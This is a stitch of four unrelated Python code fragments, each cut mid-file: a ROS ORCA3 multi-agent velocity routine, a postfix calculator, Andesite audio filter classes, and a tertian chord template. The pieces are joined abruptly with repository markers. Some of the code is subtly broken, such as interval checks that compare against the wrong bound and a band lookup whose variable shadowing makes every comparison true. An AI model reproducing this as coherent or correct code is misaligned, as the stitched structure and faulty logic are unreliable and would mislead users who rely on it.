other agents. agent_radius = params_dicc["agent_radius"] # 2 float The radius of the agent. Must be non-negative maxSpeed = params_dicc["maxSpeed"] # 0.4 float The maximum speed of the agent. Must be non-negative. velocity = (1, 1, 1) obs_radius = 0.5 # Create an object of orca3 solver class and give the above defined parameters sim = rvo23d.PyRVOSimulator(params_dicc["timeStep"], params_dicc["neighborDist"], params_dicc["N_neighbors_aware"], params_dicc["timeHorizon"], params_dicc["agent_radius"], params_dicc["maxSpeed"], velocity) # Select nearest Agents and Neighbors orca_agent_list = [] prefered_velocity = self.SimpleGuidance() # Select a velocity directly to goal as if there weren't exist neighbors # Add to orca3 and to own list every agent created by own params position_array = self.ArrayFromPose(self.agents_data_list[self.ID-1].position.pose)[0] velocity_array = self.ArrayFromTwist(self.agents_data_list[self.ID-1].velocity.twist)[0] prefered_velocity_array = self.ArrayFromTwist(prefered_velocity)[0] orca_agent_list = [sim.addAgent((position_array[0],position_array[1],position_array[2]), params_dicc["neighborDist"], params_dicc["N_neighbors_aware"], params_dicc["timeHorizon"], params_dicc["agent_radius"], params_dicc["maxSpeed"], (velocity_array[0],velocity_array[1],velocity_array[2]))] # Set the prefered velocity of own Agent as decided avobe sim.setAgentPrefVelocity(orca_agent_list[0],(prefered_velocity_array[0],prefered_velocity_array[1],prefered_velocity_array[2])) for n_neighbor in range(len(self.near_neighbors_sorted["ids"])): if self.near_neighbors_sorted["types"][n_neighbor] == "agent": n_agent = self.near_neighbors_sorted["ids"][n_neighbor] position_array = self.ArrayFromPose(self.agents_data_list[n_agent].position.pose)[0] velocity_array = self.ArrayFromTwist(self.agents_data_list[n_agent].velocity.twist)[0] orca_agent_list.append(sim.addAgent((position_array[0],position_array[1],position_array[2]), params_dicc["neighborDist"], params_dicc["N_neighbors_aware"], params_dicc["timeHorizon"], params_dicc["agent_radius"], params_dicc["maxSpeed"], (velocity_array[0],velocity_array[1],velocity_array[2]))) sim.setAgentPrefVelocity(orca_agent_list[-1],(velocity_array[0],velocity_array[1],velocity_array[2])) # Add to orca3 and to own list every obstacle created by own params elif self.near_neighbors_sorted["types"][n_neighbor] == "obs": n_obs = self.near_neighbors_sorted["ids"][n_neighbor] obs_pose = self.obs_pose_list[n_obs] orca_agent_list.append(sim.addAgent((obs_pose[0][0],obs_pose[0][1],obs_pose[0][2]), params_dicc["neighborDist"], params_dicc["N_neighbors_aware"], params_dicc["timeHorizon"], obs_radius, 0.0, (0, 0, 0))) sim.setAgentPrefVelocity(orca_agent_list[-1],(0,0,0)) sim.doStep() # Perform a step of orca3 selected_velocity = sim.getAgentVelocity(orca_agent_list[0]) # Extract own velocity decided by orca3 # Become that velocity in a twist new_velocity_twist = Twist(Vector3(0,0,0),Vector3(0,0,0)) new_velocity_twist.linear.x = selected_velocity[0] new_velocity_twist.linear.y = selected_velocity[1] new_velocity_twist.linear.z = selected_velocity[2] # If head use selected, decide it by direct by simple algorithm. In future, put lower threshold. if self.heading_use == True: new_velocity_twist.angular.z = prefered_velocity.angular.z return new_velocity_twist def ORCA3_from_node(self): if "agent_created" not in self.algorithms_dicc["orca3"].keys(): # rospy.wait_for_service('orca/add_agents') # try: # add_agent_prox = rospy.ServiceProxy('orca/add_agents', MESSAGEEEEEEEEEEEEEE ) # # model_name = "{0}_{1}".format(self.agent_models[n_agent],n_agent+1) # add_agent_prox(model_name) # time.sleep(0.1) # except rospy.ServiceException, e: # print "Service call failed: %s"%e # print "error in add orca agent" self.orca_optimal_velocity = Twist() self.algorithms_dicc["orca3"]["agent_created"] = True self.algorithms_dicc["orca3"]["prefered_velocity_pub"] = rospy.Publisher('/orca/agent_{}/prefered_velocity'.format(self.ID), TwistStamped, queue_size = 1) def handle_orca_optimal_velocity(data): self.orca_optimal_velocity = data.twist rospy.Subscriber('/orca/agent_{}/optimal_velocity'.format(self.ID), TwistStamped, handle_orca_optimal_velocity) prefered_velocity = self.SimpleGuidance() prefered_velocity_stamped = TwistStamped() prefered_velocity_stamped.twist = prefered_velocity self.algorithms_dicc["orca3"]["prefered_velocity_pub"].publish(prefered_velocity_stamped) time.sleep(0.1) return self.orca_optimal_velocity # Function to set velocity directly to goal def SimpleGuidance(self): if self.smooth_path_mode != 0: return self.agents_data_list[self.ID-1].smooth_velocity # Set algorithm params desired_speed_at_goal = 0 aprox_distance = 3 # Create a vector from actual position to goal position relative_distance = np.asarray([self.goal["pose"].position.x-self.agents_data_list[self.ID-1].position.pose.position.x,\ self.goal["pose"].position.y-self.agents_data_list[self.ID-1].position.pose.position.y,\ self.goal["pose"].position.z-self.agents_data_list[self.ID-1].position.pose.position.z]) distance_norm = np.linalg.norm(relative_distance) # Calculate its norm # If at the distance shorter than aproximation distance, reduce the velocity module if distance_norm < aprox_distance: self.desired_speed = desired_speed_at_goal - (self.desired_speed - desired_speed_at_goal)\ + ((self.desired_speed - desired_speed_at_goal) *2) / (1 + math.exp(-5*distance_norm/aprox_distance)) # Multiply each axis by the velocity module relative_WP_linear=Vector3(relative_distance[0]/distance_norm*self.desired_speed,\ relative_distance[1]/distance_norm*self.desired_speed,\ relative_distance[2]/distance_norm*self.desired_speed) # Transform it in a pose position and calculate its orientation in Euler angles relative_WP_pose_degrees=Pose(relative_WP_linear,\ Vector3(np.arctan2(relative_WP_linear.z,relative_WP_linear.y),\ np.arctan2(relative_WP_linear.x,relative_WP_linear.z),\ np.arctan2(relative_WP_linear.y,relative_WP_linear.x))) #### COMPROBAR ANGULOS # Transform the orientation from Eurler angles to quaternions orientation_list = [self.agents_data_list[self.ID-1].position.pose.orientation.x, self.agents_data_list[self.ID-1].position.pose.orientation.y, self.agents_data_list[self.ID-1].position.pose.orientation.z, self.agents_data_list[self.ID-1].position.pose.orientation.w] euler = tf.transformations.euler_from_quaternion(orientation_list) # Create the velocity twist with calculated data new_velocity_twist = Twist(relative_WP_pose_degrees.position,\ Vector3(0,\ 0,\ relative_WP_pose_degrees.orientation.z-euler[2])) # Thresholds imposition # new_velocity_twist.linear.x = self.UpperLowerSaturation(new_velocity_twist.linear.x,1.5) # new_velocity_twist.linear.y = self.UpperLowerSaturation(new_velocity_twist.linear.y,1.5)
<gh_stars>10-100 """Module containing class `Calculator`.""" import math import operator class CalculatorError(Exception): pass class Calculator: """ Postfix calculator. An instance of this class evaluates postfix expressions, with a focus on arithmetic and boolean logic. The syntax and semantics of the calculator are similar but not identical to those of a small subset of the PostScript programming language. """ def __init__(self): self._dict_stack = _DictionaryStack() self._operand_stack = _OperandStack() @property def dict_stack(self): return self._dict_stack @property def operand_stack(self): return self._operand_stack def clear(self): self._dict_stack.clear() self._operand_stack.clear() def execute(self, code): tokens = code.split() for token in tokens: # integer try: obj = int(token) except ValueError: pass else: self._operand_stack.push(obj) continue # float try: obj = float(token) except ValueError: pass else: self._operand_stack.push(obj) continue # name try: obj = self._dict_stack.get(token) except KeyError: raise CalculatorError(f'Unrecognized name "{token}".') else: if isinstance(obj, _Operator): obj.execute(self) else: self._operand_stack.push(obj) class _DictionaryStack: def __init__(self): self._system_dict = _SYSTEM_DICT self.clear() def clear(self): self._user_dict = {} def get(self, name): try: return self._user_dict[name] except KeyError: try: return self._system_dict[name] except KeyError: raise CalculatorError(f'Unrecognized name "{name}".') def put(self, name, value): self._user_dict[name] = value class _OperandStack: def __init__(self): self.clear() def clear(self): self._operands = [] def __len__(self): return len(self._operands) def push(self, obj): self._operands.append(obj) def pop(self): try: return self._operands.pop() except IndexError: raise CalculatorError('Attempt to pop from empty operand stack.') def peek(self, operand_count=1): if len(self) < operand_count: operand_count = _get_operand_count_text(operand_count) raise CalculatorError( f'Attempt to peek at {operand_count} of operand stack ' f'that has only {len(self)}.') else: return self._operands[-operand_count:] def _get_operand_count_text(operand_count): suffix = '' if operand_count == 1 else 's' return f'{operand_count} operand{suffix}' class _Type: def __init__(self, name): self._name = name @property def name(self): return self._name def is_instance(self, x): raise NotImplementedError() class _SimpleType(_Type): def __init__(self, name, included_class_info, excluded_class_info=()): super().__init__(name) self._included_class_info = included_class_info self._excluded_class_info = excluded_class_info def is_instance(self, x): return isinstance(x, self._included_class_info) and \ not isinstance(x, self._excluded_class_info) class _AnyType(_Type): def __init__(self): super().__init__('any') def is_instance(self, _): return True class _UnionType(_Type): def __init__(self, types): name = ' | '.join(t.name for t in types) super().__init__(name) self._types = tuple(types) def is_instance(self, x): return any(t.is_instance(x) for t in self._types) # Interpreter value types. _Boolean = _SimpleType('boolean', bool) _Integer = _SimpleType('integer', int, bool) _Float = _SimpleType('float', float) _String = _SimpleType('string', str) _Number = _UnionType((_Integer, _Float)) _Any = _AnyType() def _is_instance(x, arg): if isinstance(arg, _Type): return arg.is_instance(x) else: return any(_is_instance(x, t) for t in arg) class _Operator: def __init__(self, name, operand_types): self._name = name self._operand_types = operand_types @property def name(self): return self._name @property def operand_types(self): return self._operand_types @property def operand_count(self): return len(self.operand_types) def execute(self, calc): raise NotImplementedError() def _check_operand_count(self, calc): operand_stack = calc.operand_stack if self.operand_count > len(operand_stack): # not enough operands for this operator required_count = _get_operand_count_text(self.operand_count) stack_count = _get_operand_count_text(len(operand_stack)) raise CalculatorError( f'Operator "{self.name}" requires {required_count} ' f'but operand stack contains only {stack_count}.') def _get_operands(self, calc): self._check_operand_count(calc) operands = calc.operand_stack.peek(self.operand_count) pairs = zip(operands, self.operand_types) for i, (operand, required_type) in enumerate(pairs): if not _is_instance(operand, required_type): value_text = _get_value_text(operand) type_name = _get_type_name(required_type) raise CalculatorError( f'Operator "{self.name}" operand {i + 1} with value ' f'{value_text} is not of required type {type_name}.') return operands def _get_value_text(x): if x is True: return 'true' elif x is False: return 'false' elif isinstance(x, str): return f'"{x}"' else: return str(x) def _get_type_name(arg): if isinstance(arg, _Type): return arg.name else: return ' | '.join(_get_type_name(t) for t in arg) class _ConstantOperator(_Operator): def __init__(self, name, constant): super().__init__(name, ()) self._constant = constant def execute(self, calc): calc.operand_stack.push(self._constant) class _Dup(_Operator): def __init__(self): super().__init__('dup', (_Any,)) def execute(self, calc): operand, = self._get_operands(calc) calc.operand_stack.push(operand) class _Exch(_Operator): def __init__(self): super().__init__('exch', (_Any, _Any)) def execute(self, calc): self._check_operand_count(calc) stack = calc.operand_stack x = stack.pop() y = stack.pop() stack.push(x) stack.push(y) class _Pop(_Operator): def __init__(self): super().__init__('pop', (_Any,)) def execute(self, calc): self._check_operand_count(calc) calc.operand_stack.pop() class _Clear(_Operator): def __init__(self): super().__init__('clear', ()) def execute(self, calc): calc.operand_stack.clear() class _BinaryOperator(_Operator): def __init__(self, name, operand_types, function): super().__init__(name, operand_types) self._function = function def execute(self, calc): # Get operands. Do not modify stack: the stack should be # modified only if the operation succeeds. x, y = self._get_operands(calc) try: # Operate. result = self._function(x, y) except Exception as e: # operation failed raise CalculatorError( f'Execution of "{self.name}" operator failed with message: ' f'{str(e)}') else: # operation succeeded # Modify stack. stack = calc.operand_stack stack.pop() stack.pop() stack.push(result) class _BinaryArithmeticOperator(_BinaryOperator): def __init__(self, name, function): operand_types = (_Number, _Number) super().__init__(name, operand_types, function) def _div(x, y): if y == 0: raise CalculatorError('divide by zero.') else: return x / y def _mod(x, y): if y == 0: raise CalculatorError('divide by zero.') else: return x % y class _UnaryOperator(_Operator): def __init__(self, name, operator_types, function): super().__init__(name, operator_types) self._function = function def execute(self, calc): # Get operand. Do not modify stack: the stack should be # modified only if the operation succeeds. x, = self._get_operands(calc) try: # Operate. result = self._function(x) except Exception as e: # operation failed raise CalculatorError( f'Execution of "{self.name}" operator failed with message: ' f'{str(e)}') else: # operation succeeded # Modify stack. stack = calc.operand_stack stack.pop() stack.push(result) class _UnaryArithmeticOperator(_UnaryOperator): def __init__(self, name, function): operand_types = (_Number,) super().__init__(name, operand_types, function) class _CoercionOperator(_UnaryOperator): def __init__(self, name, function): operand_types = ((_Integer, _Float, _String),) super().__init__(name, operand_types, function) def _boolean(x): if x == 'true': return True elif x == 'false': return False else: x = _get_value_text(x) raise CalculatorError(f'cannot coerce {x}.') def _integer(x): return _coerce(x, int) def _coerce(x, type_): try: return type_(x) except Exception: x = _get_value_text(x) raise CalculatorError(f'cannot coerce {x}.') def _float(x): return _coerce(x, float) class _ComparisonOperator(_BinaryOperator): def __init__(self, name, function): operand_types = (_Any, _Any) super().__init__(name, operand_types, function) def _eq(x, y): # In most circumstances we delegate to Python's == operator. # That operator compares False and True as though they were 0 # and 1, respectively, however, which we do not want. We deal # with this by returning False if one operand is boolean and # the other is not. is_boolean = _Boolean.is_instance if is_boolean(x) == is_boolean(y): # either both operands are boolean or both are non-boolean return x == y else: # one operand is boolean and the other is not return False def _ne(x, y): return not _eq(x, y) def _gt(x, y): return _compare(x, y, operator.gt) def _compare(x, y, op): # In most circumstances we delegate to Python's comparison operators. # Those operators compare False and True as though they were 0 and 1, # respectively, however, which we do not want. We deal with this by # raising an exception if one operand is boolean and the other is not. is_boolean = _Boolean.is_instance if is_boolean(x) == is_boolean(y): # either both operands are boolean or both are non-boolean try: return op(x, y) except Exception: pass # If we get here, either one operand is boolean and the other is # not or `op` raised an exception. x = _get_value_text(x) y = _get_value_text(y) raise CalculatorError(f'cannot compare {x} and {y}.') def _ge(x, y): return _compare(x, y, operator.ge) def _lt(x, y): return _compare(x, y, operator.lt) def _le(x, y): return _compare(x, y, operator.le) class _BinaryLogicalOperator(_BinaryOperator): def __init__(self, name, function): operand_types = (_Boolean, _Boolean) super().__init__(name, operand_types, function) class _UnaryLogicalOperator(_UnaryOperator): def __init__(self, name, function): operand_types = (_Boolean,) super().__init__(name, operand_types, function) _OPERATORS = ( # constants _ConstantOperator('true', True), _ConstantOperator('false', False), # stack manipulation _Dup(), _Exch(), _Pop(), _Clear(), # binary arithmetic _BinaryArithmeticOperator('add', operator.add), _BinaryArithmeticOperator('sub', operator.sub), _BinaryArithmeticOperator('mul', operator.mul), _BinaryArithmeticOperator('div', _div), _BinaryArithmeticOperator('mod', _mod), _BinaryArithmeticOperator('pow', operator.pow), # unary arithmetic _UnaryArithmeticOperator('neg', operator.neg), _UnaryArithmeticOperator('abs', abs), _UnaryArithmeticOperator('ceiling', math.ceil), _UnaryArithmeticOperator('floor', math.floor), _UnaryArithmeticOperator('round', round), _UnaryArithmeticOperator('exp', math.exp), _UnaryArithmeticOperator('ln', math.log), _UnaryArithmeticOperator('log2', math.log2), _UnaryArithmeticOperator('log10', math.log10), # coercion _CoercionOperator('boolean', _boolean), _CoercionOperator('integer', _integer), _CoercionOperator('float', _float), # comparison
<filename>andesite/models/filters.py """Andesite audio filters. Attributes: FILTER_MAP (Mapping[str, Type[Filter]]): Mapping from filter name to filter class. See: `get_filter_model`. FilterMapLike (Union[FilterMap, Dict[str, Union[Filter, RawDataType]]]): (Type alias) Type of objects which can be used as filter maps. This includes the `FilterMap`. """ import abc from dataclasses import dataclass, field from operator import eq from typing import Any, Dict, Iterable, Iterator, List, Mapping, MutableMapping, Optional, Set, Type, TypeVar, Union, \ overload from andesite.transform import RawDataType, build_from_raw, convert_to_raw __all__ = ["Filter", "EqualizerBand", "Equalizer", "Karaoke", "Timescale", "Tremolo", "Vibrato", "VolumeFilter", "get_filter_model", "FilterMap", "FilterMapLike"] def _ensure_in_interval(value: float, *, low: float = None, low_inc: float = None, up: float = None, up_inc: float = None) -> None: """Ensure a value is within an interval. Raises: ValueError: If the provided value isn't within the given constraints. """ low_symbol: Optional[str] = None up_symbol: Optional[str] = None valid: bool = True if low_inc is not None: low_symbol = f"[{low_inc}" if not value >= low: valid = False elif low is not None: low_symbol = f"({low}" if not value > low: valid = False if up_inc is not None: up_symbol = f"{up_inc}]" if not value <= up_inc: valid = False elif up is not None: up_symbol = f"{up})" if value < up_inc: valid = False if not valid: low_symbol = low_symbol or "[-INF" up_symbol = up_symbol or "INF]" raise ValueError(f"Provided value ({value}) not in interval {low_symbol}, {up_symbol}!") class _Filter(abc.ABC): """Filter with name. Attributes: __filter_name__ (str): Name of the filter. This is a magic attribute used by the library to convert the filter into its Andesite representation. """ __filter_name__: str @dataclass class Filter(_Filter, abc.ABC): """Audio filter for Andesite. Attributes: enabled (bool): Whether or not the filter is enabled. This value is mostly useful when receiving the filters from Andesite. However you can also set it to `False` when sending filters. This will cause the settings to be ignored and instead the default values are sent to Andesite which will cause the filter to be disabled. When creating a new `Filter` instance its values are set to the default value. """ enabled: bool = True def reset(self) -> None: """Reset the filter settings back to their default values.""" self.__init__() @classmethod def __transform_output__(cls, data: RawDataType) -> RawDataType: enabled = data.pop("enabled") if enabled: return data else: # create a new instance (which uses the defaults) and return its data return convert_to_raw(cls()) @dataclass class EqualizerBand: """ Attributes: band (int): band number to configure ( 0 - 14 ) gain (float): value to set for the band ( [-0.25, 1.0] ) """ band: int gain: float = 0.0 def set_band(self, value: int) -> None: """Setter for :py:attr:`band` which performs a value check. Args: value: Value to set for the band. ( [0, 14] ) Raises: ValueError: if the provided value is invalid. """ _ensure_in_interval(value, low_inc=0, up_inc=14) self.band = value def set_gain(self, value: float) -> None: """Setter for :py:attr:`gain` which performs a value check. Args: value: Value to set for the gain. ( [-0.25, 1] ) Raises: ValueError: if the provided value is invalid. """ _ensure_in_interval(value, low_inc=-.25, up_inc=1) self.gain = value @dataclass class Equalizer(Filter): """ Attributes: bands (List[EqualizerBand]): array of bands to configure """ __filter_name__ = "equalizer" bands: List[EqualizerBand] = field(default_factory=list) def __iter__(self) -> Iterator[EqualizerBand]: return iter(self.bands) def __eq__(self, other: Any) -> bool: if isinstance(other, Equalizer): for my_gain, other_gain in zip(self.iter_band_gains(), other.iter_band_gains()): if my_gain != other_gain: return False return True else: return NotImplemented def __hash__(self) -> int: return hash(self.iter_band_gains()) @classmethod def __transform_input__(cls, data: RawDataType) -> None: # Andesite sends the equalizer filter as an array of floats bands = data["bands"] for i, gain in enumerate(bands): bands[i] = EqualizerBand(i, gain) @classmethod def from_gains(cls, gains: Iterable[Optional[float]]) -> "Equalizer": """Create an `Equalizer` filter from a list of gains. Args: gains: Iterable of `float` which correspond to the gain for the band, or `None` if the band doesn't specify a gain. """ bands: List[EqualizerBand] = [] for i, gain in enumerate(gains): if gain is not None: bands.append(EqualizerBand(i, gain)) return cls(True, bands) @overload def get_band(self, band: int) -> EqualizerBand: ... @overload def get_band(self, band: int, create: bool) -> Optional[EqualizerBand]: ... def get_band(self, band: int, create: bool = True) -> Optional[EqualizerBand]: """Get the specified band from the bands list. If the band doesn't exist it is created. If you don't want to automatically create a band, pass `create=False`. Args: band: Band number to get create: Whether or not to create a new band if it doesn't exist. (Defaults to True) """ try: return next(band for band in self.bands if band.band == band) except StopIteration: pass if not create: return None band = EqualizerBand(band) self.bands.append(band) return band def get_band_gain(self, band: int) -> Optional[float]: """Get the gain of a band. Returns: Gain of the band or `None` if it doesn't exist. """ band = self.get_band(band, create=False) if band: return band.gain else: return None def set_band_gain(self, band: int, gain: float) -> None: """Set the gain of a band to the specified value. If the band does not exist it is created. Args: band: Band number to set the gain for. gain: Value to set for the gain. ( [-0.25, 1] ) Raises: ValueError: if the provided gain is invalid. """ self.get_band(band).set_gain(gain) @overload def iter_band_gains(self, use_default: bool) -> List[Optional[float]]: ... @overload def iter_band_gains(self) -> List[float]: ... def iter_band_gains(self, use_default: bool = True) -> List[Optional[float]]: """Get a list of all the bands' gains in order. Args: use_default: Whether or not to replace non-existent values with the default gain. If `False` and band doesn't have a gain set, `None` is used instead. """ default_value: Union[float, None] = EqualizerBand.gain if use_default else None gains: List[Optional[float]] = 15 * [default_value] for band in self: gain = band.gain if use_default and gain is None: continue gains[band.band] = gain return gains @dataclass class Karaoke(Filter): """ Attributes: level (float) mono_level (float) filter_band (float) filter_width (float) """ __filter_name__ = "karaoke" level: float = 1.0 mono_level: float = 1.0 filter_band: float = 220.0 filter_width: float = 100.0 @dataclass class Timescale(Filter): """ Attributes: speed (float): speed to play music at (> 0) pitch (float): pitch to set (> 0) rate (float): rate to set (> 0) """ __filter_name__ = "timescale" speed: float = 1.0 pitch: float = 1.0 rate: float = 1.0 def set_speed(self, value: float) -> None: """Setter for :py:attr:`speed` which performs a value check. Args: value: Value to set for the speed. ( (0, INF] ) Raises: ValueError: if the provided value is invalid. """ _ensure_in_interval(value, low=0) self.speed = value def set_pitch(self, value: float) -> None: """Setter for :py:attr:`pitch` which performs a value check. Args: value: Value to set for the pitch. ( (0, INF] ) Raises: ValueError: if the provided value is invalid. """ _ensure_in_interval(value, low=0) self.pitch = value def set_rate(self, value: float) -> None: """Setter for :py:attr:`rate` which performs a value check. Args: value: Value to set for the rate. ( (0, INF] ) Raises: ValueError: if the provided value is invalid. """ _ensure_in_interval(value, low=0) self.rate = value @dataclass class Tremolo(Filter): """ Attributes: frequency (float): (> 0) depth (float): ( (0, 1] ) """ __filter_name__ = "tremolo" frequency: float = 2.0 depth: float = 0.5 def set_frequency(self, value: float) -> None: """Setter for :py:attr:`frequency` which performs a value check. Args: value: Value to set for the frequency. ( (0, INF] ) Raises: ValueError: if the provided value is invalid. """ _ensure_in_interval(value, low=0) self.frequency = value def set_depth(self, value: float) -> None: """Setter for :py:attr:`depth` which performs a value check. Args: value: Value to set for the depth. ( (0, 1] ) Raises: ValueError: if the provided value is invalid. """ _ensure_in_interval(value, low=0, up_inc=1) self.depth = value @dataclass class Vibrato(Filter): """ Attributes: frequency (float): ( (0, 14] ) depth (float): ( (0, 1] ) """ __filter_name__ = "vibrato" frequency: float = 2.0 depth: float = 0.5 def set_frequency(self, value: float) -> None: """Setter for :py:attr:`frequency` which performs a value check. Args: value: Value to set for the frequency. ( (0, 14] ) Raises: ValueError: if the provided value is invalid. """ _ensure_in_interval(value,
<gh_stars>1-10 """ File: tertian_chord_template.py Purpose: Class that defines a tertian chord in all its variations. """ from harmonicmodel.chord_template import ChordTemplate from tonalmodel.interval import Interval, IntervalType from tonalmodel.diatonic_tone import DiatonicTone from harmonicmodel.tertian_chord import TertianChord import re import logging class TertianChordType: """ Enum class defining all the tertian chord varieties. """ Maj6, Maj, Min6, Min, Dim, Aug, MajSus2, MajSus4, MajSus, Maj7, Maj7Sus4, Maj7Sus2, Maj7Sus, Min7, Dom7, Dom7Sus4,\ Dom7Sus2, Dom7Sus, Dim7, HalfDim7, MinMaj7, AugMaj7, Aug7, DimMaj7, Dom7Flat5, Fr, Ger, It, N6 = range(29) def __init__(self, ctype): self.value = ctype def __str__(self): if self.value == TertianChordType.Maj: return 'Maj' if self.value == TertianChordType.Min: return 'Min' if self.value == TertianChordType.Dim: return 'Dim' if self.value == TertianChordType.Aug: return 'Aug' if self.value == TertianChordType.MajSus2: return 'MajSus2' if self.value == TertianChordType.MajSus4: return 'MajSus4' if self.value == TertianChordType.MajSus: return 'MajSus' if self.value == TertianChordType.Maj7: return 'Maj7' if self.value == TertianChordType.Maj7Sus4: return 'Maj7Sus4' if self.value == TertianChordType.Maj7Sus2: return 'Maj7Sus2' if self.value == TertianChordType.Maj7Sus: return 'Maj7Sus' if self.value == TertianChordType.Min7: return 'Min7' if self.value == TertianChordType.Dom7: return 'Dom7' if self.value == TertianChordType.Dom7Sus4: return 'Dom7Sus4' if self.value == TertianChordType.Dom7Sus2: return 'Dom7Sus2' if self.value == TertianChordType.Dom7Sus: return 'Dom7Sus' if self.value == TertianChordType.Dim7: return 'Dim7' if self.value == TertianChordType.HalfDim7: return 'HalfDim7' if self.value == TertianChordType.MinMaj7: return 'MinMaj7' if self.value == TertianChordType.AugMaj7: return 'AugMaj7' if self.value == TertianChordType.Aug7: return 'Aug7' if self.value == TertianChordType.DimMaj7: return 'DimMaj7' if self.value == TertianChordType.Dom7Flat5: return 'Dom7Flat5' if self.value == TertianChordType.Maj6: return 'Maj6' if self.value == TertianChordType.Min6: return 'Min6' if self.value == TertianChordType.Fr: return 'Fr' if self.value == TertianChordType.Ger: return 'Ger' if self.value == TertianChordType.It: return 'It' if self.value == TertianChordType.N6: return 'N6' @staticmethod def to_type(t_string): t = None if t_string == 'Maj': t = TertianChordType.Maj elif t_string == 'MajSus2': t = TertianChordType.MajSus2 elif t_string == 'MajSus4': t = TertianChordType.MajSus4 elif t_string == 'MajSus': t = TertianChordType.MajSus elif t_string == 'Min': t = TertianChordType.Min elif t_string == 'Dim': t = TertianChordType.Dim elif t_string == 'Aug': t = TertianChordType.Aug elif t_string == 'Maj7': t = TertianChordType.Maj7 elif t_string == 'Maj7Sus2': t = TertianChordType.Maj7Sus2 elif t_string == 'Maj7Sus4': t = TertianChordType.Maj7Sus4 elif t_string == 'Maj7Sus': t = TertianChordType.Maj7Sus elif t_string == 'Min7': t = TertianChordType.Min7 elif t_string == 'Dom7': t = TertianChordType.Dom7 elif t_string == 'Dom7Sus2': t = TertianChordType.Dom7Sus2 elif t_string == 'Dom7Sus4': t = TertianChordType.Dom7Sus4 elif t_string == 'Dom7Sus': t = TertianChordType.Dom7Sus elif t_string == 'Dim7': t = TertianChordType.Dim7 elif t_string == 'HalfDim7': t = TertianChordType.HalfDim7 elif t_string == 'MinMaj7': t = TertianChordType.MinMaj7 elif t_string == 'AugMaj7': t = TertianChordType.AugMaj7 elif t_string == 'Aug7': t = TertianChordType.Aug7 elif t_string == 'DimMaj7': t = TertianChordType.DimMaj7 elif t_string == 'Dom7Flat5': t = TertianChordType.Dom7Flat5 elif t_string == 'Maj6': t = TertianChordType.Maj6 elif t_string == 'Min6': t = TertianChordType.Min6 elif t_string == 'Fr': t = TertianChordType.Fr elif t_string == 'Ger': t = TertianChordType.Ger elif t_string == 'It': t = TertianChordType.It elif t_string == 'N6': t = TertianChordType.N6 return TertianChordType(t) if t is not None else None def __eq__(self, y): return self.value == y.value def __hash__(self): return self.__str__().__hash__() class TertianChordTemplate(ChordTemplate): """ Template for tertian chords. We have a regular expression syntax to cover these cases that roughly goes: (T|t)?((I|II|...)|A-G)(Maj|Min| ...)?(+?(b|#)?[2-15])*(@[1-7])? Examples: IIMaj7+b9@3 CDom7 TIVDim7Flat5#3 The third is sharped Note: The idea of modifiying scale degree ala: (+|-)?(I|II|...) was considered. The notation traces back to -ii being used as a shorthand for Neopolian Six chords. The reference: https://en.wikipedia.org/wiki/Neapolitan_chord provides an interesting argument of using Phrygian scales to provide an underpinning for Neopolican. However, to take the notation to the next level, cases such as +iv and -vi need similar underpinning, which at this point cannot be found. So we are not allowing this notation unless a solid theoretical solution appears. """ TERTIAN_CHORD_TYPE_MAP = { TertianChordType.Maj: [Interval(1, IntervalType.Perfect), Interval(3, IntervalType.Major), Interval(5, IntervalType.Perfect)], TertianChordType.MajSus2: [Interval(1, IntervalType.Perfect), Interval(2, IntervalType.Major), Interval(5, IntervalType.Perfect)], TertianChordType.MajSus4: [Interval(1, IntervalType.Perfect), Interval(4, IntervalType.Perfect), Interval(5, IntervalType.Perfect)], TertianChordType.MajSus: [Interval(1, IntervalType.Perfect), Interval(4, IntervalType.Perfect), Interval(5, IntervalType.Perfect)], TertianChordType.Min: [Interval(1, IntervalType.Perfect), Interval(3, IntervalType.Minor), Interval(5, IntervalType.Perfect)], TertianChordType.Dim: [Interval(1, IntervalType.Perfect), Interval(3, IntervalType.Minor), Interval(5, IntervalType.Diminished)], TertianChordType.Aug: [Interval(1, IntervalType.Perfect), Interval(3, IntervalType.Major), Interval(5, IntervalType.Augmented)], TertianChordType.Maj7: [Interval(1, IntervalType.Perfect), Interval(3, IntervalType.Major), Interval(5, IntervalType.Perfect), Interval(7, IntervalType.Major)], TertianChordType.Maj7Sus2: [Interval(1, IntervalType.Perfect), Interval(2, IntervalType.Major), Interval(5, IntervalType.Perfect), Interval(7, IntervalType.Major)], TertianChordType.Maj7Sus4: [Interval(1, IntervalType.Perfect), Interval(4, IntervalType.Perfect), Interval(5, IntervalType.Perfect), Interval(7, IntervalType.Major)], TertianChordType.Maj7Sus: [Interval(1, IntervalType.Perfect), Interval(4, IntervalType.Perfect), Interval(5, IntervalType.Perfect), Interval(7, IntervalType.Major)], TertianChordType.Min7: [Interval(1, IntervalType.Perfect), Interval(3, IntervalType.Minor), Interval(5, IntervalType.Perfect), Interval(7, IntervalType.Minor)], TertianChordType.Dom7: [Interval(1, IntervalType.Perfect), Interval(3, IntervalType.Major), Interval(5, IntervalType.Perfect), Interval(7, IntervalType.Minor)], TertianChordType.Dom7Sus2: [Interval(1, IntervalType.Perfect), Interval(2, IntervalType.Major), Interval(5, IntervalType.Perfect), Interval(7, IntervalType.Minor)], TertianChordType.Dom7Sus4: [Interval(1, IntervalType.Perfect), Interval(4, IntervalType.Perfect), Interval(5, IntervalType.Perfect), Interval(7, IntervalType.Minor)], TertianChordType.Dom7Sus: [Interval(1, IntervalType.Perfect), Interval(4, IntervalType.Perfect), Interval(5, IntervalType.Perfect), Interval(7, IntervalType.Minor)], TertianChordType.Dim7: [Interval(1, IntervalType.Perfect), Interval(3, IntervalType.Minor), Interval(5, IntervalType.Diminished), Interval(7, IntervalType.Diminished)], TertianChordType.HalfDim7: [Interval(1, IntervalType.Perfect), Interval(3, IntervalType.Minor), Interval(5, IntervalType.Diminished), Interval(7, IntervalType.Minor)], TertianChordType.MinMaj7: [Interval(1, IntervalType.Perfect), Interval(3, IntervalType.Minor), Interval(5, IntervalType.Perfect), Interval(7, IntervalType.Major)], TertianChordType.AugMaj7: [Interval(1, IntervalType.Perfect), Interval(3, IntervalType.Major), Interval(5, IntervalType.Augmented), Interval(7, IntervalType.Major)], TertianChordType.Aug7: [Interval(1, IntervalType.Perfect), Interval(3, IntervalType.Major), Interval(5, IntervalType.Augmented), Interval(7, IntervalType.Minor)], TertianChordType.DimMaj7: [Interval(1, IntervalType.Perfect), Interval(3, IntervalType.Minor), Interval(5, IntervalType.Diminished), Interval(7, IntervalType.Major)], TertianChordType.Dom7Flat5: [Interval(1, IntervalType.Perfect), Interval(3, IntervalType.Major), Interval(5, 